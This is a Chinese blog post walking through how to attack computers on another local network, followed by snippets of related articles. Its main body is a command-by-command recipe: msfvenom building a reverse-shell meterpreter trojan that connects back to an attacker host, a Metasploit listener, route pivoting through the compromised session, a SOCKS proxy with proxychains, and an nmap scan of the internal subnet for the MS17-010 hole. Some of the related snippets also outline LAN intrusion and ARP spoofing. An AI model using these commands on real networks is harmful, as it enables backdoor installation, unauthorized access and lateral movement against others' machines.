通过socks 代理 攻击局域网的电脑

已于 2022-05-11 21:17:58 修改
阅读量1.1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全渗透 文章标签: linux java 网络
于 2022-05-11 20:18:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54472394/article/details/124716803

攻击其他局域网内的电脑

文章目录

前言

提示:

123

一、生成木马

1.生成木马

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.55 LPORT=4444 -b "\x00" -f elf -o feixiang

2.设置监听

use exploit/multi/handler

3.设置reverse payload

exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.55
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) run

二、等待目标机上钩之后

1.把meterpreter 保存到后台

background

查看路由信息

route

2.添加一条路由转发

 route add 192.168.110.111 255.255.255.0 1

1:是sessions
配置完路由实际上就可以访问目标了。

三、配置 socks 代理

use auxiliary/server/socks_proxy    #启动代理
run
vim /etc/proxychains4.conf       #更改代理文件
socks5 192.168.0.55 1080 #添加一行

1080 跟socks_proxy 的 srvport 对应

2.通过代理扫描内网。


└─# proxychains nmap -Pn -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.110.0/24

3.通过代理启动 msf

└─ proxychains msfdb run

--------------容易遇到的问题--------------

添加 firewall-cmd --zone=public --add-port=80/tcp --permanent (–permanent永久生效,没有此参数重启后失效)

重新载入 firewall-cmd --reload

查看 firewall-cmd --zone=public --query-port=80/tcp

删除 firewall-cmd --zone=public --remove-port=80/tcp --permanent

[隧道代理] 隧道代理 — 应用层内网代理 - 代理连接工具
Blue17 の 小窝
02-18 1189
在前几章中我们已经讲解完了,下面我们开始进入内网代理的章节。当我们通过漏洞进入目标内网后,我们一般见到的拓扑场景如下:那么假设我们要进行进一步的渗透,即内网渗透,我们应该如何攻击到对方内网呢?我们与对方内网唯一存在联系的地方就是它们的边界机器(也有可能是目标内网的一台机器),此时我们的思路大概有如下两种:思路一:将工具上传到对方的边界机器,然后使用对方边界机器对内网进行扫描。缺点一:万一工具刚一落地就被对方机器嘎了咋办?缺点二:假设一个工具需要 Python 环境,对方电脑没有咋办?
使用 mitmproxy + python 做拦截代理
墨鱼菜鸡
07-11 4231
From:https://blog.wolfogre.com/posts/usage-of-mitmproxy https://www.cnblogs.com/H4ck3R-XiX/p/12624072.htmlhttp://www.cnblogs.com/grandlulu/p/9525417.html mitmProxy 介绍:https:/...
攻击局域网计算机,如何攻击局域网电脑
weixin_30803191的博客
07-24 5877
如何攻击局域网电脑?1.知道到他的IP,然后在运行里面打上\\IP\C$,需要打用户名和密码,用户名打administrator,除非他没设置密码,你可以直接进入,然后可以任意改他C盘里面的东西,甚至直接放木马进.2.ping 他的IP,只要你知道对方的IP就在开始-运行-ping 192.168.1.*就的行了挖,嘿嘿哈,他CPU就利用了100%了,嘿嘿3.直接用 局域网终结者4.用ADSL...
入侵局域网电脑
擅长写bug,摆烂,白日梦。
12-19 9633
方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: X
内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
寻觅的博客
04-25 3089
文章目录搭建靶场配置虚拟机网络虚拟机 搭建靶场 配置虚拟机网络 这里我用的是最常见的VMware Workstation虚拟机软件,我们先做一个内部的网络环境 虚拟机 我这里是使用的是CFS三层靶机环境 下载链接:https://pan.baidu.com/s/1n2i6Tr2lXC_T8kSEJFcBsA 提取码:ni2v 我发现网上的方法吧DHCP关掉后我的靶机就无法获取到IP地址了,所以我又开启了这里的DHCP。这里IP最后一段不和说明书是完全一样也不影响。 尝试一下通网段能互相ping通即可,
python攻击局域网电脑_怎么攻击对方电脑?以知对方IP,且对方在线
weixin_39788703的博客
12-07 6384
匿名用户1级2018-09-11 回答点击开始→运行→cmd→输入 ping 加他的IP -l size -t以下可借鉴:下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 N...
横向移动:Socks 代理 || 本地代理 技术.
网络安全领域___专研者.
06-12 7918
Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
代理上网软件
05-30
在描述中提到,“使用IE代理上网软件,可以通过此软件代理其他电脑,通过IE”,这表明该软件可能具有网络共享功能,使得局域网内的多台电脑能够通过一台主机的网络连接来上网,而主机则扮演了代理服务器的角色。...
网络攻击方案
学海无涯
05-21 2169
攻击设想:基于校园网web的完整渗透测试 攻击步骤:方案一:1. 隐藏IP2. 踩点扫描3. 获得系统或管理员权限4. 种植后门5. 事了拂衣(清理痕迹并隐身) 方案二:1. 检测网站安全性2. 使用注入工具破解管理员用户、密码3. 使用工具破解MD5密码4. 找寻登录网站管理后台5. 拿到网站webshell6. 拿到服务器权限 方案一:STEP1: 隐藏IP通常有两种方法实现IP的隐藏,第一...
关于代理服务器的原理及用法
weixin_33910137的博客
02-22 4153
一,什么是代理服务器(Proxy)?     答:以类似代理人的身份取的用户需要的数据。由于它的【代理】能力,使得我们可以透过代理服务器来达成防火墙与用户数据的分析。除此之外我们还可以借助代理服务器来达成节省带宽的目的,以及加快内部网络对因特网的万维网的访问速度。当客户端有因特网的数据要求时,Proxy会帮用户向目的地取得用户所需要的数据。所以当客户端指定www的代理服务器之后,用户的所有...
用Kali实现局域网内ARP欺骗和中间人攻击
热门推荐
nszmsjhshs的博客
03-12 2万+
用Kali实现局域网内ARP欺骗和中间人攻击 我们先介绍一下什么是中间人攻击,什么是ARP协议和什么是ARP欺骗: 什么是中间人攻击:中间人攻击是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人” 什么是ARP协议:ARP协议准确的来说是ARP地址解析协议:即ARP,是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以
【渗透测试】socks代理打穿内网
m0_74272345的博客
10-01 2366
在渗透测试中,当我们拿到web服务器的root控制权限时,发现web服务器的网卡信息,如果要继续对内网进行渗透,我们就必须要建立起一个网络连接来连通自己的Kali和内网机器。Socks是一种代理服务,可以简单地将一端的系统连接到另外一端,支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议,其标准端口为1080对于socks代理的建立,收集了一些工具和方法。
内网安全:Socks 代理 -- 本地代理 技术.
ZL_1618的博客
04-10 2305
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完。
网络安全基础篇——攻防环境搭建
Z4400840的博客
05-06 2996
在数字化时代,网络安全已经成为每个企业和个人必须面对的挑战。攻防环境的搭建是提升网络安全意识和技能的重要手段。本文将带你深入了解攻防环境的概念,以及如何一步步搭建起你自己的攻防实验平台。,即一个模拟真实网络环境的实验平台,它可以用来进行安全测试、渗透测试和安全技能训练。通过攻防环境,我们可以在不触及真实系统的前提下,练习和掌握各种安全技能。配置靶机虚拟机的ip和网关。
认识黑客常用的入侵方法
weixin_34206899的博客
06-16 1130
导读 在Interent中,为了防止黑客入侵自己的计算机,就必须了解黑客入侵目标计算机的常用方法。黑客常用的入侵方法有数据驱动攻击、系统文件非法利用、伪造信息攻击 以及远端操纵等,下面就简单介绍这些入侵方法。 数据驱动攻击 数据驱动攻击是指黑客向目标计算机发送或复制的表面上看来无害的特殊程序被执行时所发起的攻击。该攻击可以让黑客在目标计算机上修改与网络安全有关的文...
GITHUB上的一些DevSecOps
qq_44005305的博客
01-31 382
最近一直在完善自己的扫描器和攻击链,所以也一直在GITHUB上看自动化的一些知识,脑壳痛看起来比较优秀的如下,本人只推荐哈DefectDojoDefectDojo 是一个安全编排和平台。DefectDojo 允许您管理您的应用程序安全程序,维护 产品和应用信息、分类漏洞和 将结果推送到 JIRA 和 Slack 等系统。DefectDojo 丰富并 使用许多启发式算法来优化漏洞数据,这些算法 随着您使用该平台的次数越多越好。github;搭建好的运行截图如下。
Socks代理
weixin_51151498的博客
07-19 1885
全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080。
实战攻防:蜜罐无关,溯源有术
最新发布
jijisaq的博客
06-03 944
突然接到通知,甲方在HVV防守前突然收到内网IP地址出现Socks代理通信,审计流量发现确实属于socks流量,不属于告警流量,告警地址为个人终端,直接准入工具阻断等待排查。整个应急流程是没有问题的,着重记录的是溯源的过程,预警产生后准入设备是直接管控终端断网的。后期联系到终端使用人之后也确实发现有上传的fscan.exe。应该还没来得及扫描,推测应该是抓取了终端用户浏览器的记录连接测试。整个应急以及溯源流程如图所示。
SOCKS Tunnel 设置
weixin_34397291的博客
09-27 176
今天在分析IPS告警时,一条 SOCKS Tunnel 告警出现了。 查看 描述 得知,是做SOCKS代理。 想了下SOCKS代理的应用场景。 穿越防火墙、端口映射、绕过端口封锁、代理上网。。。。。 (随便做了个实验,权当抛砖引玉,欢迎拍砖!!) 想到这里,立刻动手测试。 本次测试一个SSH SOCKS Tunnel。 准备: 开启了SSH(22)的可以联网...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值